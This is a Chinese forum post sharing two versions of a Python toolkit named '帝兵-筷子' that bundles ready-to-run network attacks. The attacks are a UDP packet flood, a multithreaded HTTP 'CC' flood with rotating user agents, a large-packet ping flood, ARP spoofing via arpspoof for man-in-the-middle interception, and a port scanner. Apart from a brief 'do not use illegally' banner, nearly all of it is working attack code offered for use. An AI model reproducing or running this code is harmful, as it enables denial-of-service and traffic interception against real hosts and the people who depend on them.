status_color = Colors.GREEN if port in [80, 443, 22] else Colors.YELLOW
print(f" {status_color}Port {port}/TCP{Colors.END} - {Colors.CYAN}{service}{Colors.END}")
else:
print(f"{Colors.RED}❌ 没有发现开放的常见端口{Colors.END}")
def create_session():
"""创建优化的session"""
try:
import requests
if HAS_REQUESTS_ADAPTER:
session = requests.Session()
adapter = HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=0)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
else:
return requests
except:
return None
def super_cc_attack():
"""超级CC攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}⚡ 超级CC攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
try:
import requests
except ImportError:
print(f"{Colors.RED}❌ requests 模块未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pip install requests{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
url = input(f"{Colors.YELLOW}🎯 目标URL (包含http://): {Colors.END}")
threads_count = int(input(f"{Colors.YELLOW}⚡ 攻击线程数(10-100): {Colors.END}"))
if threads_count < 10:
threads_count = 10
if threads_count > 100:
threads_count = 100
print(f"\n{Colors.RED}💥 开始超级CC攻击 {Colors.CYAN}{url}{Colors.END}")
print(f"{Colors.YELLOW}🎯 攻击线程: {threads_count}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
total_requests = 0
successful_requests = 0
failed_requests = 0
start_time = time.time()
# 统计信息
status_codes = {}
# 用户代理列表
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/537.36',
'Mozilla/5.0 (Android 10; Mobile) AppleWebKit/537.36'
]
def http_flood(thread_id):
nonlocal total_requests, successful_requests, failed_requests
session = create_session()
while not stop_attack:
try:
headers = {
'User-Agent': random.choice(user_agents),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'
}
if session:
response = session.get(url, headers=headers, verify=False, timeout=2)
else:
response = requests.get(url, headers=headers, verify=False, timeout=2)
successful_requests += 1
# 统计状态码
status_code = response.status_code
status_codes[status_code] = status_codes.get(status_code, 0) + 1
except Exception as e:
failed_requests += 1
finally:
total_requests += 1
# 启动攻击线程
threads = []
for i in range(threads_count):
thread = threading.Thread(target=http_flood, args=(i,))
thread.daemon = True
threads.append(thread)
thread.start()
# 实时显示攻击过程
last_total = 0
last_print_time = time.time()
try:
while not stop_attack:
current_time = time.time()
elapsed_time = current_time - start_time
# 每秒更新显示
if current_time - last_print_time >= 0.5:
current_total = total_requests
requests_per_sec = (current_total - last_total) * 2
last_total = current_total
last_print_time = current_time
avg_speed = current_total / elapsed_time if elapsed_time > 0 else 0
# 清屏并显示攻击面板
os.system('clear')
print(f"{Colors.RED}{Colors.BOLD}")
print("╔══════════════════════════════════════════════════════════════╗")
print("║ ⚡ 超级CC攻击进行中 ⚡ ║")
print("╚══════════════════════════════════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.CYAN}🎯 攻击目标: {Colors.YELLOW}{url}{Colors.END}")
print(f"{Colors.CYAN}🚀 攻击线程: {Colors.GREEN}{threads_count}{Colors.END}")
print(f"{Colors.CYAN}⏱️ 攻击时长: {Colors.YELLOW}{elapsed_time:.1f}秒{Colors.END}")
print()
# 主要统计信息
print(f"{Colors.GREEN}📊 总请求数: {Colors.WHITE}{total_requests}{Colors.END}")
print(f"{Colors.GREEN}✅ 成功请求: {Colors.WHITE}{successful_requests}{Colors.END}")
print(f"{Colors.RED}❌ 失败请求: {Colors.WHITE}{failed_requests}{Colors.END}")
print()
# 速度信息
print(f"{Colors.YELLOW}⚡ 实时速度: {Colors.WHITE}{requests_per_sec} 请求/秒{Colors.END}")
print(f"{Colors.YELLOW}📈 平均速度: {Colors.WHITE}{avg_speed:.0f} 请求/秒{Colors.END}")
print()
# 状态码分布
if status_codes:
print(f"{Colors.CYAN}🎯 HTTP状态码分布:{Colors.END}")
for code, count in sorted(status_codes.items()):
color = Colors.GREEN if code == 200 else Colors.YELLOW if code < 400 else Colors.RED
print(f" {color}HTTP {code}: {count}{Colors.END}")
print()
# 攻击强度显示
intensity = min(threads_count // 5, 20)
print(f"{Colors.RED}💥 攻击强度: {Colors.WHITE}{'█' * intensity}{'░' * (20 - intensity)}{Colors.END}")
print()
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
time.sleep(0.1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.RED}🛑 攻击停止!{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
final_time = time.time() - start_time
final_stats = f"""
{Colors.CYAN}📊 最终攻击统计:{Colors.END}
{Colors.YELLOW}⏱️ 总运行时间: {Colors.GREEN}{final_time:.1f}秒{Colors.END}
{Colors.YELLOW}📨 总请求数: {Colors.GREEN}{total_requests}{Colors.END}
{Colors.YELLOW}✅ 成功请求: {Colors.GREEN}{successful_requests}{Colors.END}
{Colors.YELLOW}❌ 失败请求: {Colors.RED}{failed_requests}{Colors.END}
{Colors.YELLOW}📈 平均速度: {Colors.GREEN}{total_requests/final_time:.0f} 请求/秒{Colors.END}
"""
print(final_stats)
def udp_flood():
"""UDP洪水攻击 - 使用之前的版本"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔥 UDP洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
port = int(input(f"{Colors.YELLOW}🎯 目标端口: {Colors.END}"))
speed = int(input(f"{Colors.YELLOW}⚡ 攻击速度(1~1000): {Colors.END}"))
print(f"\n{Colors.RED}💥 开始UDP攻击 {Colors.CYAN}{ip}:{port}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes_data = random._urandom(1490)
sent = 0
while True:
try:
sock.sendto(bytes_data, (ip, port))
sent = sent + 1
print(f"\r{Colors.GREEN}已发送 {sent} 个数据包到 {ip} 端口 {port}{Colors.END}", end="", flush=True)
time.sleep((1000 - speed) / 2000)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 UDP攻击停止,总共发送 {sent} 个数据包{Colors.END}")
break
except Exception as e:
print(f"\n{Colors.RED}❌ 发生错误: {e}{Colors.END}")
break
sock.close()
def ping_flood():
"""Ping洪水攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🎯 Ping洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
print(f"\n{Colors.RED}💥 开始Ping攻击 {Colors.CYAN}{ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sent = 0
start_time = time.time()
try:
while True:
# 使用系统ping命令
response = os.system(f"ping -c 1 -s 65500 {ip} > /dev/null 2>&1")
sent += 1
elapsed_time = time.time() - start_time
speed_actual = sent / elapsed_time if elapsed_time > 0 else 0
print(f"\r{Colors.GREEN}📤 已发送: {sent} Ping包 | ⚡ 速度: {speed_actual:.1f} 包/秒 | ⏱️ 时长: {elapsed_time:.1f}秒{Colors.END}", end="", flush=True)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 Ping攻击停止,总共发送 {sent} 个数据包{Colors.END}")
def main_menu():
"""主菜单"""
while True:
print_banner()
print_menu()
choice = input(f"\n{Colors.YELLOW}🎯 请选择功能 (1-7): {Colors.END}")
if choice == '1':
udp_flood()
elif choice == '2':
super_cc_attack()
elif choice == '3':
arp_spoof()
elif choice == '4':
quick_port_scan()
elif choice == '5':
ping_flood()
elif choice == '6':
show_system_info()
elif choice == '7':
print(f"\n{Colors.CYAN}👋 感谢使用帝兵-筷子,再见!{Colors.END}")
exit()
else:
print(f"\n{Colors.RED}❌ 无效选择,请重新输入{Colors.END}")
time.sleep(1)
continue
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
if __name__ == "__main__":
try:
# 检查基本依赖
missing_deps = check_dependencies()
if missing_deps:
print(f"{Colors.RED}警告: 缺少依赖 {', '.join(missing_deps)}")
print(f"请运行: pip install {' '.join(missing_deps)}{Colors.END}")
time.sleep(2)
main_menu()
except KeyboardInterrupt:
print(f"\n\n{Colors.CYAN}👋 程序已退出{Colors.END}")
使用道具 举报
import socket
import random
import os
import threading
import requests
from datetime import datetime
import urllib3
import sys
import subprocess
# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 颜色代码
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
WHITE = '\033[97m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def print_banner():
"""打印辉煌的横幅"""
os.system("clear")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}")
print(" ╔══════════════════════════════════╗")
print(" ║ 帝兵-筷子 终极版 ║")
print(" ║ EMPEROR WEAPON - CHOPSTICKS ║")
print(" ╚══════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.YELLOW} 网络安全测试工具集合")
print(f"{Colors.GREEN} 作者: 跨紫大帝")
print(f"{Colors.RED} 警告:请勿用于非法用途")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
def print_menu():
"""打印菜单"""
print(f"\n{Colors.CYAN}{Colors.BOLD}🏹 请选择攻击模式:{Colors.END}")
print(f"{Colors.GREEN}┌────────────────────────────────────────────┐")
print(f"│ {Colors.YELLOW}1.{Colors.END} 🔥 UDP洪水攻击 (原始版) {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}2.{Colors.END} ⚡ 超级CC攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}3.{Colors.END} 🌐 ARP欺骗攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}4.{Colors.END} 🔍 快速端口扫描 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}5.{Colors.END} 🎯 Ping洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}6.{Colors.END} 🛠️ ApacheBench测试 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}7.{Colors.END} 📊 系统信息 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}8.{Colors.END} ❌ 退出程序 {Colors.GREEN}│")
print(f"└────────────────────────────────────────────┘{Colors.END}")
def check_dependencies():
"""检查依赖是否安装"""
missing_deps = []
try:
import requests
except ImportError:
missing_deps.append("requests")
try:
import urllib3
except ImportError:
missing_deps.append("urllib3")
return missing_deps
def show_system_info():
"""显示系统信息"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}📊 系统信息{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# Python信息
print(f"{Colors.YELLOW}🐍 Python版本: {Colors.GREEN}{sys.version}{Colors.END}")
# 检查依赖
missing_deps = check_dependencies()
if missing_deps:
print(f"{Colors.RED}❌ 缺少依赖: {', '.join(missing_deps)}{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pip install {' '.join(missing_deps)}{Colors.END}")
else:
print(f"{Colors.GREEN}✅ 所有依赖已安装{Colors.END}")
# 网络信息
try:
hostname = socket.gethostname()
print(f"{Colors.YELLOW}🌐 主机名: {Colors.GREEN}{hostname}{Colors.END}")
except:
pass
# 系统时间
print(f"{Colors.YELLOW}⏰ 系统时间: {Colors.GREEN}{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
def is_valid_ip(ip):
"""验证IP地址格式"""
try:
socket.inet_aton(ip)
return True
except socket.error:
return False
def get_mac(ip):
"""获取IP对应的MAC地址"""
try:
# 使用arp命令获取MAC地址
result = subprocess.check_output(f"arp -n {ip}", shell=True, text=True, stderr=subprocess.DEVNULL)
lines = result.split('\n')
for line in lines:
if ip in line:
parts = line.split()
if len(parts) >= 3:
return parts[2]
return None
except:
return None
def check_arpspoof():
"""检查arpspoof是否可用"""
try:
subprocess.run(["which", "arpspoof"], check=True, capture_output=True)
return True
except:
return False
def arp_spoof():
"""ARP欺骗攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🌐 ARP欺骗攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# 检查arpspoof是否安装
if not check_arpspoof():
print(f"{Colors.RED}❌ arpspoof 未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pkg install dsniff{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
target_ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
gateway_ip = input(f"{Colors.YELLOW}🌐 网关IP: {Colors.END}")
if not is_valid_ip(target_ip) or not is_valid_ip(gateway_ip):
print(f"{Colors.RED}❌ IP地址格式错误!{Colors.END}")
return
print(f"\n{Colors.YELLOW}🔍 正在获取MAC地址...{Colors.END}")
target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)
if not target_mac:
print(f"{Colors.RED}❌ 无法获取目标MAC地址{Colors.END}")
return
if not gateway_mac:
print(f"{Colors.RED}❌ 无法获取网关MAC地址{Colors.END}")
return
print(f"{Colors.GREEN}✅ 目标MAC: {target_mac}{Colors.END}")
print(f"{Colors.GREEN}✅ 网关MAC: {gateway_mac}{Colors.END}")
print(f"\n{Colors.RED}💥 开始ARP欺骗攻击...{Colors.END}")
print(f"{Colors.YELLOW}🎯 目标: {target_ip} -> 网关: {gateway_ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
sent_packets = 0
start_time = time.time()
arpspoof_processes = []
try:
while not stop_attack:
try:
# 发送ARP欺骗包
proc1 = subprocess.Popen(["arpspoof", "-i", "wlan0", "-t", target_ip, gateway_ip],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
proc2 = subprocess.Popen(["arpspoof", "-i", "wlan0", "-t", gateway_ip, target_ip],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
arpspoof_processes.extend([proc1, proc2])
sent_packets += 2
elapsed_time = time.time() - start_time
print(f"\r{Colors.GREEN}📤 已发送: {sent_packets} ARP包 | ⏱️ 时长: {elapsed_time:.1f}秒 | 🎯 目标: {target_ip} <-> 网关: {gateway_ip}{Colors.END}", end="", flush=True)
time.sleep(2)
# 清理旧的进程
for proc in arpspoof_processes[:]:
if proc.poll() is not None:
arpspoof_processes.remove(proc)
except Exception as e:
print(f"\n{Colors.RED}❌ 发送ARP包失败: {e}{Colors.END}")
time.sleep(1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.YELLOW}🛑 停止ARP攻击,恢复ARP表...{Colors.END}")
# 杀死所有arpspoof进程
for proc in arpspoof_processes:
try:
proc.terminate()
except:
pass
# 额外清理
os.system("pkill arpspoof 2>/dev/null")
time.sleep(2)
print(f"{Colors.GREEN}✅ ARP表已恢复{Colors.END}")
def quick_port_scan():
"""快速端口扫描"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔍 快速端口扫描{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
target = input(f"{Colors.YELLOW}🎯 目标IP或域名: {Colors.END}")
# 常见端口列表
common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 993, 995,
2082, 2083, 2086, 2087, 2095, 3306, 3389, 5432, 5900, 8080, 8443]
print(f"\n{Colors.GREEN}🚀 快速扫描 {Colors.CYAN}{target}{Colors.GREEN} 的 {len(common_ports)} 个常见端口{Colors.END}")
print(f"{Colors.YELLOW}⏳ 扫描中...{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
open_ports = []
start_time = time.time()
def scan_port(port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((target, port))
sock.close()
return port, result == 0
except:
return port, False
# 使用多线程扫描
threads = []
for port in common_ports:
thread = threading.Thread(target=lambda p=port: open_ports.append(p) if scan_port(p)[1] else None)
threads.append(thread)
thread.start()
# 显示进度
for i, thread in enumerate(threads):
thread.join()
progress = ((i + 1) / len(common_ports)) * 100
print(f"\r{Colors.CYAN}📈 进度: {progress:.1f}% | 🟢 发现开放端口: {len(open_ports)}{Colors.END}", end="", flush=True)
elapsed_time = time.time() - start_time
print(f"\n\n{Colors.GREEN}✅ 扫描完成!耗时: {elapsed_time:.1f}秒{Colors.END}")
if open_ports:
print(f"\n{Colors.GREEN}🎯 开放的端口:{Colors.END}")
common_services = {
21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP", 53: "DNS",
80: "HTTP", 110: "POP3", 143: "IMAP", 443: "HTTPS", 993: "IMAPS",
995: "POP3S", 2082: "cPanel", 2083: "cPanel SSL", 2086: "WHM",
2087: "WHM SSL", 2095: "Webmail", 3306: "MySQL", 3389: "RDP",
5432: "PostgreSQL", 5900: "VNC", 8080: "HTTP-alt", 8443: "HTTPS-alt"
}
for port in sorted(open_ports):
service = common_services.get(port, "未知服务")
status_color = Colors.GREEN if port in [80, 443, 22] else Colors.YELLOW
print(f" {status_color}Port {port}/TCP{Colors.END} - {Colors.CYAN}{service}{Colors.END}")
else:
print(f"{Colors.RED}❌ 没有发现开放的常见端口{Colors.END}")
def create_session():
"""创建优化的session"""
try:
import requests
from requests.adapters import HTTPAdapter
session = requests.Session()
adapter = HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=0)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
except:
return None
def super_cc_attack():
"""超级CC攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}⚡ 超级CC攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
try:
import requests
except ImportError:
print(f"{Colors.RED}❌ requests 模块未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pip install requests{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
url = input(f"{Colors.YELLOW}🎯 目标URL (包含http://): {Colors.END}")
threads_count = int(input(f"{Colors.YELLOW}⚡ 攻击线程数(10-100): {Colors.END}"))
if threads_count < 10:
threads_count = 10
if threads_count > 100:
threads_count = 100
print(f"\n{Colors.RED}💥 开始超级CC攻击 {Colors.CYAN}{url}{Colors.END}")
print(f"{Colors.YELLOW}🎯 攻击线程: {threads_count}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
total_requests = 0
successful_requests = 0
failed_requests = 0
start_time = time.time()
# 统计信息
status_codes = {}
# 用户代理列表
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/537.36',
'Mozilla/5.0 (Android 10; Mobile) AppleWebKit/537.36'
]
def http_flood(thread_id):
nonlocal total_requests, successful_requests, failed_requests
session = create_session()
while not stop_attack:
try:
headers = {
'User-Agent': random.choice(user_agents),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'
}
if session:
response = session.get(url, headers=headers, verify=False, timeout=2)
else:
response = requests.get(url, headers=headers, verify=False, timeout=2)
successful_requests += 1
# 统计状态码
status_code = response.status_code
status_codes[status_code] = status_codes.get(status_code, 0) + 1
except Exception as e:
failed_requests += 1
finally:
total_requests += 1
# 启动攻击线程
threads = []
for i in range(threads_count):
thread = threading.Thread(target=http_flood, args=(i,))
thread.daemon = True
threads.append(thread)
thread.start()
# 实时显示攻击过程
last_total = 0
last_print_time = time.time()
try:
while not stop_attack:
current_time = time.time()
elapsed_time = current_time - start_time
# 每秒更新显示
if current_time - last_print_time >= 0.5:
current_total = total_requests
requests_per_sec = (current_total - last_total) * 2
last_total = current_total
last_print_time = current_time
avg_speed = current_total / elapsed_time if elapsed_time > 0 else 0
# 清屏并显示攻击面板
os.system('clear')
print(f"{Colors.RED}{Colors.BOLD}")
print("╔══════════════════════════════════════════════════════════════╗")
print("║ ⚡ 超级CC攻击进行中 ⚡ ║")
print("╚══════════════════════════════════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.CYAN}🎯 攻击目标: {Colors.YELLOW}{url}{Colors.END}")
print(f"{Colors.CYAN}🚀 攻击线程: {Colors.GREEN}{threads_count}{Colors.END}")
print(f"{Colors.CYAN}⏱️ 攻击时长: {Colors.YELLOW}{elapsed_time:.1f}秒{Colors.END}")
print()
# 主要统计信息
print(f"{Colors.GREEN}📊 总请求数: {Colors.WHITE}{total_requests}{Colors.END}")
print(f"{Colors.GREEN}✅ 成功请求: {Colors.WHITE}{successful_requests}{Colors.END}")
print(f"{Colors.RED}❌ 失败请求: {Colors.WHITE}{failed_requests}{Colors.END}")
print()
# 速度信息
print(f"{Colors.YELLOW}⚡ 实时速度: {Colors.WHITE}{requests_per_sec} 请求/秒{Colors.END}")
print(f"{Colors.YELLOW}📈 平均速度: {Colors.WHITE}{avg_speed:.0f} 请求/秒{Colors.END}")
print()
# 状态码分布
if status_codes:
print(f"{Colors.CYAN}🎯 HTTP状态码分布:{Colors.END}")
for code, count in sorted(status_codes.items()):
color = Colors.GREEN if code == 200 else Colors.YELLOW if code < 400 else Colors.RED
print(f" {color}HTTP {code}: {count}{Colors.END}")
print()
# 攻击强度显示
intensity = min(threads_count // 5, 20)
print(f"{Colors.RED}💥 攻击强度: {Colors.WHITE}{'█' * intensity}{'░' * (20 - intensity)}{Colors.END}")
print()
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
time.sleep(0.1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.RED}🛑 攻击停止!{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
final_time = time.time() - start_time
final_stats = f"""
{Colors.CYAN}📊 最终攻击统计:{Colors.END}
{Colors.YELLOW}⏱️ 总运行时间: {Colors.GREEN}{final_time:.1f}秒{Colors.END}
{Colors.YELLOW}📨 总请求数: {Colors.GREEN}{total_requests}{Colors.END}
{Colors.YELLOW}✅ 成功请求: {Colors.GREEN}{successful_requests}{Colors.END}
{Colors.YELLOW}❌ 失败请求: {Colors.RED}{failed_requests}{Colors.END}
{Colors.YELLOW}📈 平均速度: {Colors.GREEN}{total_requests/final_time:.0f} 请求/秒{Colors.END}
"""
print(final_stats)
def udp_flood_original():
"""UDP洪水攻击 - 使用原始版本"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔥 UDP洪水攻击模式 (原始版本){Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
print(" ")
print("作者: 跨紫大帝")
print("请勿用于非法用途")
ip = input("请输入 IP : ")
port = int(input("攻击端口 : "))
sd = int(input("攻击速度(1~1000) : "))
os.system("clear")
# 创建socket和随机数据
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes_data = random._urandom(1490)
print(f"{Colors.RED}💥 开始UDP攻击 {Colors.CYAN}{ip}:{port}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sent = 0
try:
while True:
sock.sendto(bytes_data, (ip, port))
sent = sent + 1
print(f"\r{Colors.GREEN}已发送 {sent} 个数据包到 {ip} 端口 {port}{Colors.END}", end="", flush=True)
time.sleep((1000 - sd) / 2000)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 UDP攻击停止,总共发送 {sent} 个数据包{Colors.END}")
except Exception as e:
print(f"\n{Colors.RED}❌ 发生错误: {e}{Colors.END}")
finally:
sock.close()
def ping_flood():
"""Ping洪水攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🎯 Ping洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
print(f"\n{Colors.RED}💥 开始Ping攻击 {Colors.CYAN}{ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sent = 0
start_time = time.time()
try:
while True:
# 使用系统ping命令
response = os.system(f"ping -c 1 -s 65500 {ip} > /dev/null 2>&1")
sent += 1
elapsed_time = time.time() - start_time
speed_actual = sent / elapsed_time if elapsed_time > 0 else 0
print(f"\r{Colors.GREEN}📤 已发送: {sent} Ping包 | ⚡ 速度: {speed_actual:.1f} 包/秒 | ⏱️ 时长: {elapsed_time:.1f}秒{Colors.END}", end="", flush=True)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 Ping攻击停止,总共发送 {sent} 个数据包{Colors.END}")
def apache_bench_test():
"""ApacheBench (ab) 压力测试"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🛠️ ApacheBench (ab) 压力测试{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# 检查ab是否安装
try:
subprocess.run(["ab", "-V"], check=True, capture_output=True)
except:
print(f"{Colors.RED}❌ ApacheBench (ab) 未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请安装: pkg install apache2-utils 或 sudo apt install apache2-utils{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
url = input(f"{Colors.YELLOW}🎯 目标URL (包含http://): {Colors.END}")
requests_count = int(input(f"{Colors.YELLOW}📊 总请求数: {Colors.END}"))
concurrency = int(input(f"{Colors.YELLOW}⚡ 并发数: {Colors.END}"))
print(f"\n{Colors.RED}💥 开始ApacheBench测试...{Colors.END}")
print(f"{Colors.YELLOW}🎯 目标: {url}{Colors.END}")
print(f"{Colors.YELLOW}📊 总请求: {requests_count} | 并发: {concurrency}{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
try:
# 执行ab命令
cmd = ["ab", "-n", str(requests_count), "-c", str(concurrency), url]
result = subprocess.run(cmd, capture_output=True, text=True)
print(f"{Colors.CYAN}📊 测试结果:{Colors.END}")
print(f"{Colors.WHITE}{result.stdout}{Colors.END}")
if result.stderr:
print(f"{Colors.RED}❌ 错误信息:{Colors.END}")
print(f"{Colors.WHITE}{result.stderr}{Colors.END}")
except Exception as e:
print(f"{Colors.RED}❌ 执行错误: {e}{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
def main_menu():
"""主菜单"""
while True:
print_banner()
print_menu()
choice = input(f"\n{Colors.YELLOW}🎯 请选择功能 (1-8): {Colors.END}")
if choice == '1':
udp_flood_original() # 原始UDP攻击版本
elif choice == '2':
super_cc_attack() # 超级CC攻击
elif choice == '3':
arp_spoof() # ARP欺骗攻击
elif choice == '4':
quick_port_scan() # 快速端口扫描
elif choice == '5':
ping_flood() # Ping洪水攻击
elif choice == '6':
apache_bench_test() # ApacheBench测试
elif choice == '7':
show_system_info() # 系统信息
elif choice == '8':
print(f"\n{Colors.CYAN}👋 感谢使用帝兵-筷子,再见!{Colors.END}")
exit()
else:
print(f"\n{Colors.RED}❌ 无效选择,请重新输入{Colors.END}")
time.sleep(1)
continue
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
if __name__ == "__main__":
try:
# 检查基本依赖
missing_deps = check_dependencies()
if missing_deps:
print(f"{Colors.RED}警告: 缺少依赖 {', '.join(missing_deps)}")
print(f"请运行: pip install {' '.join(missing_deps)}{Colors.END}")
time.sleep(2)
main_menu()
except KeyboardInterrupt:
print(f"\n\n{Colors.CYAN}👋 程序已退出{Colors.END}")
使用道具 举报